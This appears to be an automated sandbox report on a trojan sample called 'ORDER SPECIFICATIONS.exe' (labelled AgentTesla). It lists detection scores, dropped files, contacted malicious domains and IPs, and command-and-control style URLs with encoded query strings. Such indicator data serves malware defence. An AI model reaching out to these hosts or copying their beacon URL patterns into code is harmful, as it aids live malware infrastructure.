External Remote Services	Scheduled Task	Startup Items	Startup Items	Software Packing13	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
ORDER SPECIFICATIONS.exe	31%	Virustotal		Browse
ORDER SPECIFICATIONS.exe	15%	ReversingLabs	Win32.Trojan.AgentTesla
ORDER SPECIFICATIONS.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\LvZiFDk.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\LvZiFDk.exe	15%	ReversingLabs	Win32.Trojan.AgentTesla

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
5.2.ORDER SPECIFICATIONS.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.abaplants.com/owws/?FZA=E2uPX13Kd8eziNpXwTixT+siYJwH/w0JmCiJBsiXejl5IKklxd2VA8+t7/1UF0B3bHAe&GzrX=Bxo0src	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/Micr	0%	Avira URL Cloud	safe
http://www.softwaresreports.info/owws/?FZA=5jCx8TJ67BDPxitFKTiPzVbAv5V4WmfLvz0iUotKb81cdHhoP6D4U31cAoF9J0eWw3xa&GzrX=Bxo0src	0%	Avira URL Cloud	safe
http://www.fontbureau.comaYn	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/dn	0%	Avira URL Cloud	safe
http://schemas.microsoft.nh	0%	Avira URL Cloud	safe
https://www.casar.com/assunto/organizacao/	0%	Avira URL Cloud	safe
http://www.tiro.comBR	0%	Avira URL Cloud	safe
https://www.casar.com/assunto/casamentos/decoracao-de-casamento/	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
https://www.casar.com/assunto/lua-de-mel-2/	0%	Avira URL Cloud	safe
http://en.wX	0%	Avira URL Cloud	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.raphaelyejesiel.com/owws/?FZA=Ng1hVjXym9Qjh/39zAZuuRZY5wWd2+1a+DNcin6p0h8GUL41G3Uc3DOSlbUNOeobFB2Q&GzrX=Bxo0src	0%	Avira URL Cloud	safe
www.athomecp.com/owws/	0%	Avira URL Cloud	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
https://www.casar.com	0%	Avira URL Cloud	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.assemble-4u.com/owws/?FZA=tHbMDDeadmVNgKYcreuncRwf7boUCKl6MNzrWMM5Jrdb4IpAp8+CGbWYAVkD3n9oZQag&GzrX=Bxo0src	0%	Avira URL Cloud	safe
https://www.casar.com/assunto/noivas/dicas-para-noivas/	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.krF	0%	Avira URL Cloud	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.tiro.comxR	0%	Avira URL Cloud	safe
http://www.fonts.come	0%	Avira URL Cloud	safe
http://www.denisekohli.com/owws/?FZA=lwHO/uUGh/aXRG65LDVUqOi7qNbSmHJrcCZCAEgZXo9YpRM01PmoothBQXBavnYq4fuq&GzrX=Bxo0src	0%	Avira URL Cloud	safe
https://www.casar.com/assunto/casamentos/casamentos-reais/	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/jp/	0%	URL Reputation	safe
https://www.casar.com/assunto/cha-de-panela/	0%	Avira URL Cloud	safe
http://www.tiro.comtn	0%	Avira URL Cloud	safe
http://www.fonts.comX	0%	Avira URL Cloud	safe
http://www.your-new-body-plan.com/owws/?FZA=wQPVVaqxY2IiVfQZkyRmW3q13fIzlgC5jJ34SIKwtgCZdzYlbOYBx3wkbgC3baC7Oc7O&GzrX=Bxo0src	0%	Avira URL Cloud	safe
https://www.casar.com/assunto/noivas/vestidos-de-noiva/	0%	Avira URL Cloud	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.founder.com.cn/cn/	0%	URL Reputation	safe
http://www.founder.com.cn/cn/	0%	URL Reputation	safe
http://www.founder.com.cn/cn/	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.fontbureau.comoitu	0%	URL Reputation	safe
http://www.fontbureau.comoitu	0%	URL Reputation	safe
http://www.fontbureau.comoitu	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/ico	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.sajatypeworks.coma-d	0%	Avira URL Cloud	safe
http://www.hostsnc.com/owws/?FZA=4P1MPend6t3dRr+zrFZAhnBbaZyC76urNt6lzZx4zgRAaIR2wDCeIn43mJ71sHhZDUem&GzrX=Bxo0src	0%	Avira URL Cloud	safe
http://www.fontbureau.comon	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
abaplants.com	50.87.196.120	true	true	unknown
www.hostsnc.com	156.240.32.114	true	true	unknown
www.athomecp.com	154.91.61.105	true	true	unknown
www.your-new-body-plan.com	34.90.54.238	true	true	unknown
denisekohli.com	34.102.136.180	true	true	unknown
softwaresreports.info	34.102.136.180	true	true	unknown
104.233.225.185.cname-url.com	170.106.171.56	true	true	unknown
assemble-4u.com	13.57.130.120	true	true	unknown
shops.myshopify.com	23.227.38.74	true	false	unknown
www.raphaelyejesiel.com	54.85.86.211	true	true	unknown
www.softwaresreports.info	unknown	unknown	true	unknown
www.gdzas08.cloud	unknown	unknown	true	unknown
www.cyjulebu.com	unknown	unknown	true	unknown
www.shamansmoke.com	unknown	unknown	true	unknown
www.abaplants.com	unknown	unknown	true	unknown
www.denisekohli.com	unknown	unknown	true	unknown
www.assemble-4u.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.abaplants.com/owws/?FZA=E2uPX13Kd8eziNpXwTixT+siYJwH/w0JmCiJBsiXejl5IKklxd2VA8+t7/1UF0B3bHAe&GzrX=Bxo0src	true	Avira URL Cloud: safe	unknown
http://www.softwaresreports.info/owws/?FZA=5jCx8TJ67BDPxitFKTiPzVbAv5V4WmfLvz0iUotKb81cdHhoP6D4U31cAoF9J0eWw3xa&GzrX=Bxo0src	true	Avira URL Cloud: safe	unknown
http://www.raphaelyejesiel.com/owws/?FZA=Ng1hVjXym9Qjh/39zAZuuRZY5wWd2+1a+DNcin6p0h8GUL41G3Uc3DOSlbUNOeobFB2Q&GzrX=Bxo0src	true	Avira URL Cloud: safe	unknown
www.athomecp.com/owws/	true	Avira URL Cloud: safe	low
http://www.assemble-4u.com/owws/?FZA=tHbMDDeadmVNgKYcreuncRwf7boUCKl6MNzrWMM5Jrdb4IpAp8+CGbWYAVkD3n9oZQag&GzrX=Bxo0src	true	Avira URL Cloud: safe	unknown
http://www.denisekohli.com/owws/?FZA=lwHO/uUGh/aXRG65LDVUqOi7qNbSmHJrcCZCAEgZXo9YpRM01PmoothBQXBavnYq4fuq&GzrX=Bxo0src	true	Avira URL Cloud: safe	unknown
http://www.your-new-body-plan.com/owws/?FZA=wQPVVaqxY2IiVfQZkyRmW3q13fIzlgC5jJ34SIKwtgCZdzYlbOYBx3wkbgC3baC7Oc7O&GzrX=Bxo0src	true	Avira URL Cloud: safe	unknown
http://www.hostsnc.com/owws/?FZA=4P1MPend6t3dRr+zrFZAhnBbaZyC76urNt6lzZx4zgRAaIR2wDCeIn43mJ71sHhZDUem&GzrX=Bxo0src	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.fontbureau.com/designersG	ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/Micr	ORDER SPECIFICATIONS.exe, 00000000.00000003.236733624.00000000059E4000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.comaYn	ORDER SPECIFICATIONS.exe, 00000000.00000003.253563451.00000000059E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.founder.com.cn/cn/bThe	ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/dn	ORDER SPECIFICATIONS.exe, 00000000.00000003.236733624.00000000059E4000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.microsoft.nh	ORDER SPECIFICATIONS.exe, 00000000.00000002.261901918.0000000007260000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.casar.com/assunto/organizacao/	chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers?	ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp	false		high
http://www.tiro.comBR	ORDER SPECIFICATIONS.exe, 00000000.00000003.233440991.00000000059FB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.casar.com/assunto/casamentos/decoracao-de-casamento/	chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tiro.com	explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp	false		high
https://www.casar.com/assunto/lua-de-mel-2/	chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://en.wX	ORDER SPECIFICATIONS.exe, 00000000.00000003.232661881.000000000121D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.goodfont.co.kr	ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css	ORDER SPECIFICATIONS.exe, 00000000.00000002.254750109.0000000002AF1000.00000004.00000001.sdmp	false		high
http://www.sajatypeworks.com	ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, ORDER SPECIFICATIONS.exe, 00000000.00000003.233207946.00000000059FB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn/cThe	ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.casar.com	chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://fontfabrik.com	ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://embed.typeform.com/embed.js	chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmp	false		high
https://connect.facebook.net/en_US/fbevents.js	chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmp	false		high
https://casarpontocom.zendesk.com/hc/pt-br	chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmp	false		high
https://www.casar.com/assunto/noivas/dicas-para-noivas/	chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/DPlease	ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fonts.com	ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sandoll.co.krF	ORDER SPECIFICATIONS.exe, 00000000.00000003.234237194.00000000059E6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.urwpp.deDPlease	ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	ORDER SPECIFICATIONS.exe, 00000000.00000002.254750109.0000000002AF1000.00000004.00000001.sdmp	false		high
http://www.pinterest.com/casarpontocom	chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmp	false		high
http://www.sakkal.com	ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.tiro.comxR	ORDER SPECIFICATIONS.exe, 00000000.00000003.233419468.00000000059FB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp	false		high
http://www.fonts.come	ORDER SPECIFICATIONS.exe, 00000000.00000003.233155052.00000000059FB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.casar.com/assunto/casamentos/casamentos-reais/	chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.youtube.com/casarpontocom	chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/jp/	ORDER SPECIFICATIONS.exe, 00000000.00000003.236733624.00000000059E4000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.casar.com/assunto/cha-de-panela/	chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tiro.comtn	ORDER SPECIFICATIONS.exe, 00000000.00000003.233440991.00000000059FB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js	chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmp	false		high
https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.js	chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmp	false		high
http://www.fonts.comX	ORDER SPECIFICATIONS.exe, 00000000.00000003.233155052.00000000059FB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.casar.com/assunto/noivas/vestidos-de-noiva/	chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.coml	ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn/	ORDER SPECIFICATIONS.exe, 00000000.00000003.235177312.00000000059E4000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn	ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, ORDER SPECIFICATIONS.exe, 00000000.00000003.234915943.00000000059E4000.00000004.00000001.sdmp, ORDER SPECIFICATIONS.exe, 00000000.00000003.234874416.0000000005A1D000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp	false		high
http://www.fontbureau.comoitu	ORDER SPECIFICATIONS.exe, 00000000.00000003.253563451.00000000059E0000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/ico	ORDER SPECIFICATIONS.exe, 00000000.00000003.236733624.00000000059E4000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/	ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, ORDER SPECIFICATIONS.exe, 00000000.00000003.236733624.00000000059E4000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sajatypeworks.coma-d	ORDER SPECIFICATIONS.exe, 00000000.00000003.233044903.00000000059FB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers8	ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp	false		high
http://www.fontbureau.comon	ORDER SPECIFICATIONS.exe, 00000000.00000003.253563451.00000000059E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://instagram.com/casarpontocom	chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
170.106.171.56	unknown	Singapore	132203	TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN	true
34.90.54.238	unknown	United States	15169	GOOGLEUS	true
50.87.196.120	unknown	United States	46606	UNIFIEDLAYER-AS-1US	true
54.85.86.211	unknown	United States	14618	AMAZON-AESUS	true
34.102.136.180	unknown	United States	15169	GOOGLEUS	true
156.240.32.114	unknown	Seychelles	328608	Africa-on-Cloud-ASZA	true
13.57.130.120	unknown	United States	16509	AMAZON-02US	true
154.91.61.105	unknown	Seychelles	62468	VPSQUANUS	true

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	356492
Start date:	23.02.2021
Start time:	08:55:55
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 41s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	ORDER SPECIFICATIONS.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	28
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@12/4@12/8
EGA Information:	Failed
HDC Information:	Successful, ratio: 10.8% (good quality ratio 9.4%) Quality average: 71.2% Quality standard deviation: 33.6%
HCA Information:	Successful, ratio: 98% Number of executed functions: 87 Number of non-executed functions: 152
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 104.42.151.234, 51.103.5.186, 204.79.197.200, 13.107.21.200, 93.184.220.29, 51.104.139.180, 168.61.161.212, 92.122.145.220, 13.64.90.137, 23.210.248.85, 92.122.213.194, 92.122.213.247, 2.20.142.210, 2.20.142.209, 8.253.95.121, 8.248.145.254, 67.26.83.254, 67.27.157.126, 8.248.123.254, 20.54.26.129 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, cs9.wac.phicdn.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, auto.au.download.windowsupdate.com.c.footprint.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, client.wns.windows.com, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, vip2-par02p.wns.notify.trafficmanager.net Report creation exceeded maximum time and may have missing disassembly code information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
08:56:54	API Interceptor	1x Sleep call for process: ORDER SPECIFICATIONS.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
54.85.86.211	JwekqCZAwt.exe	Get hash	malicious	Browse	www.anaejoao2021.com/d8h/?YvFH=wR-xA2rHgBVhIve&KXRxqv=+QMxmTeTC6jkfr4PP0NsNs+LKlSXE0MxkE7EsU8NRX32ujCu2Mn1Ekqy+ne7AOeWmMaD
	request.exe	Get hash	malicious	Browse	www.anaejoao2021.com/d8h/?1bS=+QMxmTeTC6jkfr4PP0NsNs+LKlSXE0MxkE7EsU8NRX32ujCu2Mn1Ekqy+neRf+uWiOSD&DXaDp=fRmTtjUX8ZQHeF6
	PO#646756575646.exe	Get hash	malicious	Browse	www.anaejoao2021.com/d8h/?EhLT5l=9rhdJxHx-Bl&YL0=+QMxmTeTC6jkfr4PP0NsNs+LKlSXE0MxkE7EsU8NRX32ujCu2Mn1Ekqy+k+rPvOu4pzE
	PO8479349743085.exe	Get hash	malicious	Browse	www.anaejoao2021.com/d8h/?-Z1hir=+QMxmTeTC6jkfr4PP0NsNs+LKlSXE0MxkE7EsU8NRX32ujCu2Mn1Ekqy+kySDOiuvvvVPuj7Qw==&2dz=onrhc
34.102.136.180	NewOrder.xlsm	Get hash	malicious	Browse	www.covidwatcharizona.com/tub0/?azuxWju=dEK3j7mWBeQXl2zlSZSqDcFEW4EdlZEYoS0+mEVRU2HuA7A7T/ky1yECx94kGVXSwos3qg==&0dt=YtdhwPcHS
	Order_20180218001.exe	Get hash	malicious	Browse	www.houstoncouplesexpert.com/seon/?EJBpf8l=ojsb3jKq/XKh64QU9jx/ITCiT4+67gOjnvEpe+kxWJrzMHvdGcv1c3rSoEz5gk4FhTBQ&kDKHiZ=QFNTw2k
	22 FEB -PROCESSING.xlsx	Get hash	malicious	Browse	www.rizrvd.com/bw82/?RFQx_=AJ+QNFfsTFGsedRB1oQHABBFVni950JEMBOKAlzmtW9JOrHkbqbPAoxgnlDKI2ECKqRl+w==&GZopM=kvuD_XrpiP
	ORDER LIST.xlsx	Get hash	malicious	Browse	www.speedysnacksbox.com/4qdc/?jpaha=oetlJbtkpt9RC07gzGtc819EDOSw/wKhNDKeGQ7agYbSWM8ZAAA074MmVo5ceZhU2bos5Q==&3fz=fxopBn3xezt4N4a0
